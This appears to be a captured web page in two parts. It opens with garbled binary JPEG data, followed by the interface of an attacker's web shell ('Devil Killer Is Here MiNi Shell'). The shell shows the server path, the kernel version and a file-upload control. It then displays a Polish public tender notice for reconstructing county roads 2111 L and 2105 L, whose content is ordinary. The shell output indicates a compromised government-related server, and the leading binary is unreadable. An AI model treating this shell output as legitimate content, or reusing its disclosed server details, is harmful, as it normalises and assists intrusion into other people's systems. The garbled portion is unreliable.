JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220909/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220909/0034191601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg powiatowych nr 2111 L Kawęczyn – Kozice – Policzyzna <br/>i nr 2105 L Krępiec – Minkowice. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Świdnicki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019460</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niepodległości 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-040</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@powiatswidnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.powiatswidnik.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg powiatowych nr 2111 L Kawęczyn – Kozice – Policzyzna <br/>i nr 2105 L Krępiec – Minkowice. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-dbf667f7-3032-11ed-9171-f6b7c7d59353</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00341916</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-09-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003409/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Przebudowa drogi powiatowej nr 2105 L Krępiec – Minkowice</p> <p class="mb-0">1.1.4 Przebudowa drogi powiatowej nr 2111 L Kawęczyn – Kozice – Policzyzna w zakresie odnowy bitumicznej nawierzchni jezdni na odcinku długości około 1200 m</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/powiatswidnik <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/powiatswidnik</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">6.6	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na „platformazakupowa.pl”, tj.:<br/>6.6.1	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>6.6.2	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>6.6.3	zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>6.6.4	włączona obsługa JavaScript,<br/>6.6.5	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6.6.6	Szyfrowanie na „platformazakupowa.pl” odbywa się za pomocą protokołu TLS 1.3.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a. Administratorem państwa danych osobowych przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego będzie jest Powiat Świdnicki w Świdniku reprezentowany przez Zarząd Powiatu w Świdniku, Mogą się Państwo z nami kontaktować w następujący sposób:<br/>	listownie na adres: Starostwo Powiatowe w Świdniku ul. Niepodległości 13, 21-040<br/>	poprzez e mail: poczta@powiatswidnik.pl<br/>	telefonicznie: 81 468-71-01,<br/>b. Wyznaczyliśmy inspektora ochrony danych.<br/>Jest to osoba, z którą mogą się Państwo kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. Z inspektorem ochrony danych mogą się Państwo kontaktować w następujący sposób:<br/>	listownie na adres: Powiat Świdnicki w Świdniku ul. Niepodległości 13, 21-040 Świdnik <br/>	poprzez e-mail: iod@powiatswidnik.pl<br/>c. Cel przetwarzania Państwa danych oraz podstawy prawne<br/>Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia publicznego. Podstawa prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt uczestnictwa w postepowaniu oraz następujące przepisy prawa:<br/>	ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. Dz. U. z 2019 r. poz. 2019 ze zm.) oraz akty wykonawcze to tejże ustawy,<br/>	ustawa o narodowym zasobie archiwalnym i archiwach (tj. Dz.U. 2019 r. poz. 553 ze zm.).<br/>d. Okres przechowywania danych<br/>Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przetwarzane będą przez okres 4 lata: od dnia zakończenia postępowania o udzielenie zamówienia.<br/>e. Komu przekazujemy Państwa dane?<br/>	Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>	Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z ustawą z dnia 11 września 2019 r. Prawo zamówień publicznych <br/>	Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o za mówienie publiczne mogą być podmioty z którymi Powiat zawarł umowy lub porozumienie na korzystanie z udostępnianych przez nie systemów informatycznych w zakresie przekazywania lub archiwizacji danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości zapoznania się z tymi danymi w związku ze świadczeniem usług wsparcia technicznego i usuwaniem awarii. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich okolicznościach wszelkich danych, w tym danych osobowych.<br/>f. Przekazywanie danych poza Europejski Obszar Gospodarczy<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa dane mogą być przekazywane do państw z poza EOG z zastrzeżeniem, o którym mowa w punkcie e ppkt 2).<br/>g. Przysługujące Państwu uprawnienia związane z przetwarzaniem danych osobowych<br/>W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie zamówienia publicznego przysługują Państwu następujące uprawnienia:<br/>	prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>	prawo do sprostowania (poprawiania) swoich danych;<br/>	prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy publicznej;<br/>	prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć możliwość skorzystania z tego praw,<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. Aby skorzystać z powyższych praw, należy się skontaktować z nami lub z naszym inspektorem ochrony danych (dane kontaktowe zawarte są w punktach a i b.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie przepisów ustawy Prawo zamówień publicznych oraz wydanych do niej przepisów wykonawczych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WID.272.14.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.	Przedmiotem Umowy jest realizacja przez Wykonawcę, na rzecz Zamawiającego, zamówienia o charakterze „buduj” pod nazwą „Przebudowa dróg powiatowych nr 2111 L Kawęczyn – Kozice – Policzyzna i nr 2105 L Krępiec – Minkowice”, za wynagrodzeniem płatnym na warunkach określonych w niniejszej Umowie oraz na zasadach określonych w Regulaminie BGK, o którym mowa w § 11 Załącznika do uchwały nr 84/2021 Rady Ministrów z dnia 1 lipca 2021 r., określający szczegółowy tryb i sposób składania wniosków o dofinansowanie z Programu, wydawania wstępnych promes i promes, w tym wzory dokumentów, wydanym przez Bank Gospodarstwa Krajowego i zatwierdzonym przez Prezesa Rady Ministrów (ogłoszony na stronach internetowych Kancelarii Prezesa Rady Ministrów(gov.pl/premier) oraz BGK (www.bgk.pl.). <br/>3.2.	Przedmiot zamówienia obejmuje wykonanie robót budowlanych, polegających na przebudowie dwóch dróg powiatowych nr 2111 L i 2105 L:<br/>1)	Przebudowa drogi powiatowej nr 2111 L Kawęczyn – Kozice – Policzyzna na odcinku o łącznej długości 930 m (od km 0+000,00 do km 0+930).<br/>2)	Przebudowa drogi powiatowej nr 2105 L Krępiec – Minkowice na odcinku o łącznej długości 897 m (od skrzyżowania z droga gminną nr 105533L do skrzyżowania z drogą powiatową nr 2106 L, 2 odcinki robót od km 0+000,00 do km 0+406,30 oraz od km 0+544,08 do km 1+035,40).<br/>3.3.	Krótki opis przedmiotu zamówienia dla drogi 2111 L<br/>Przebudowa drogi powiatowej nr 2111 L Kawęczyn – Kozice – Policzyzna na odcinku o łącznej długości 930 m (od km 0+000,00 do km 0+930) swoim zakresem obejmuje następujące roboty w branży drogowej:<br/>−	geodezyjne wytyczenie obiektu,<br/>−	wykonanie wykopów pod poszerzenia konstrukcji drogowej,<br/>−	profilowanie podłoża pod warstwy konstrukcyjne poszerzenia konstrukcji drogowej,<br/>−	wykonanie warstwy mrozoochronnej z mieszanek kruszywa związanego cementem C1,5/2 na poszerzeniu konstrukcji drogowej,<br/>−	wykonanie podbudowy zasadniczej z mieszanki niezwiązanej kruszywa C90/3 na poszerzeniu konstrukcji drogowej,<br/>−	częściowe rozebranie konstrukcji uszkodzonych krawędzi drogi,<br/>−	uzupełnienie ubytków w istniejącej warstwie ścieralnej,<br/>−	mechaniczne oczyszczenie i skropienie emulsją asfaltową warstw konstrukcyjnych pod warstwy asfaltowe drogi,<br/>−	wykonanie warstwy wyrównawczej z betonu asfaltowego AC16W,<br/>−	ułożenie siatki z włókien szklanych,<br/>−	wykonanie warstw asfaltowych wiążącej i ścieralnej z betonu asfaltowego AC16W i AC11S,<br/>−	plantowanie terenu pod pobocza i dowiązanie wysokościowe do terenów przyległych,<br/>−	konserwacja odcinkowych rowów przydrożnych – odmulenie i udrożnienie,<br/>−	konserwacja istniejącego przepustu – odmulenie i umocnienie skarp wlotu i wylotu,<br/>−	wykonanie poboczy ulepszonych kruszywem łamanym stabilizowanym mechanicznie,<br/>−	utwardzenie istniejących zjazdów kruszywem łamanych stabilizowanym mechanicznie,<br/>−	wprowadzenie stałej organizacji ruchu (wg odrębnego opracowania),<br/>−	wykonanie inwentaryzacji geodezyjnej powykonawczej,<br/>−	uporządkowanie terenu po zakończeniu robót budowlanych.<br/>4.	Krótki opis przedmiotu zamówienia dla drogi 2105 L<br/>Przebudowa drogi powiatowej nr 2105 L Krępiec – Minkowice na odcinku o łącznej długości 897 m od skrzyżowania z droga gminną nr 105533L do skrzyżowania z drogą powiatową nr 2106 L. Przebudowa obejmuje 2 odcinki robót: od km 0+000,00 do km 0+406,30 oraz od km 0+544,08 do km 1+035,40 tworzące spójny ciąg drogi (ODCINEK A-B i ODCINEK C-D) swoim zakresem obejmuje następujące roboty w branży drogowej:<br/>-	roboty rozbiórkowe<br/>-	wycinkę drzew i krzewów<br/>-	roboty ziemne<br/>-	wykonanie nawierzchni jezdni w technologii mas bitumicznych o szerokości jezdni 5,5 m <br/>z lokalnymi poszerzeniami na łukach<br/>-	utwardzenie poboczy gruntowych kruszywem łamanym gr. 15 cm na szerokości 1,0 m<br/>-	wykonanie chodnika usytuowanego przy krawędzi jezdni drogi powiatowej (wraz z peronem przy przystanku autobusowym) o nawierzchni z betonowej kostki brukowej gr. 6 cm szerokości 2,0 m na odcinkach:<br/>•	od km 0+644,65 do km 0+670,35 po lewej stronie drogi powiatowej (przystanek autobusowy w km 0+657,45)<br/>•	od km 0+701,75 do km 0+765,75 po prawej stronie drogi powiatowej (przystanek autobusowy w km 0+750,75)<br/>-	wykonanie chodnika o nawierzchni z betonowej kostki brukowej gr. 6 cm szerokości 1,5 m oddzielonego od jezdni pasem zieleni o szerokości 1,75 m na odcinku od km 0+670,35 <br/>do km 0+705,75<br/>-	wykonanie zjazdów indywidualnych w granicach pasa drogowego drogi powiatowej poprzez uzupełnienie nawierzchni zjazdu kruszywem łamanym 0,31/5 mm stabilizowanym mechanicznie grubości 0,15 m<br/>-	regulację wysokościową zjazdów „do góry” w przypadku zjazdów o nawierzchni <br/>z betonowej kostki brukowej, płyt betonowych, chodnikowych lub płyt ażurowych w granicy pasa drogowego drogi powiatowej<br/>-	wykonanie odwodnienia przedmiotowego odcinka drogi powiatowej w postaci rowu przydrożnego zlokalizowanego po prawej stronie drogi powiatowej wraz z profilowaniem skarp<br/>-	wykonanie krawężnika odwadniającego i wpustu deszczowego z króćcem odpływowym, odprowadzających wody opadowe z nawierzchni jezdni do projektowanego rowu<br/>-	wykonanie przepustów z rur PP Ø50 pod zjazdami w ciągu projektowanego rowu<br/>-	wykonanie w obrębie najniższych lokalnych punktów niwelety ścieków trójkątnych wraz ze ściekami skarpowymi<br/>•	od km 0+177,93 do km 0+187,93 strona prawa - ściek długości 10,0 m<br/>•	od km 0+182,15 do km 0+198,15 strona lewa - ściek długości 16,0 m<br/>•	od km 0+728,75 do km 0+749,75 strona lewa - ściek długości 21,0 m<br/>•	od km 1+008,93 do km 1+028,93 strona prawa - ściek długości 20,0 m<br/>•	od km 1+008,93 do km 1+028,93 strona lewa - ściek długości 20,0 m<br/>-	wykonanie umocnień skarp i dna rowów poprzez humusowanie wraz z obsianiem mieszanką traw<br/>-	wykonanie lokalnych umocnień skarp rowów płytami ażurowymi o wymiarach 60x40x8 cm na podsypce piaskowej gr. 10 cm<br/>-	zabezpieczenie istniejącej sieci telekomunikacyjnej rurami osłonowymi dwudzielnymi <br/>A120 PS<br/>-	wykonanie oznakowania pionowego i poziomego<br/>-	ustawienie latarni ulicznych hybrydowych z zastosowaniem oprawy typu LED, doświetlających projektowane przejście dla pieszych oraz dojścia do przystanków komunikacji zbiorowej. Latarnie uliczne zaprojektowano:<br/>•	w km 0+660,95 oraz w km 0+705,75 po lewej stronie jezdni dp 2105L<br/>•	w km 0+701,75 oraz w km 0+747,25 po prawej stronie jezdni dp 2105L.<br/> - wykonanie urządzeń bezpieczeństwa ruchu w postaci balustrad.<br/>5.	Szczegółowy opis przedmiotu zamówienia określają następujące dokumenty:<br/>a) projekty budowlane,<br/>b) szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych (SSTWiORB),<br/>c) przedmiary robót.<br/>SZCZEGÓŁY W SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">OKRES GWARANCJI I RĘKOJMI</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunków w tym zakresie<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to <br/>z odrębnych przepisów:<br/>Zamawiający nie stawia warunków w tym zakresie<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia warunków w tym zakresie<br/>4) zdolności technicznej lub zawodowej:<br/>a)	Wykonawca spełni warunek, jeżeli posiada doświadczenie niezbędne do wykonania przedmiotu zamówienia, tj. udokumentuje należyte wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dwie roboty budowlane które polegały na budowie, przebudowie lub rozbudowie dróg każda o wartości brutto nie mniejszej niż 1 000 000,00 zł Przez wartość 1 roboty budowlanej Zamawiający rozumie roboty budowlane wykonane w ramach 1 umowy (1 zadania inwestycyjnego). W przypadku podania kwot w walutach obcych Zamawiający dokona ich przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) z dnia opublikowania ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym NBP opublikuje ww. informacje.<br/>Uwaga: w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) warunek zostanie uznany za spełniony, jeżeli co najmniej jeden ze wspólników konsorcjum samodzielnie posiada wymagane doświadczenie (nie dopuszcza się sumowania potencjału wspólników w zakresie doświadczenia). Podobnie w przypadku powoływania się na zasoby podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu (w zakresie doświadczenia), podmiot ten musi samodzielnie posiadać doświadczenie opisane powyżej.<br/>b)	Wykonawca spełni warunek, jeżeli dysponuje osobami zdolnymi do wykonania zamówienia, w tym:<br/>- co najmniej 1 osobą, która będzie pełnić funkcję kierownika budowy, posiadającą uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie obejmujących kierowanie robotami budowlanymi, posiadającą uprawnienia budowlane w specjalności drogowej, o minimalnym doświadczeniu 1 roku ma stanowisku kierownika 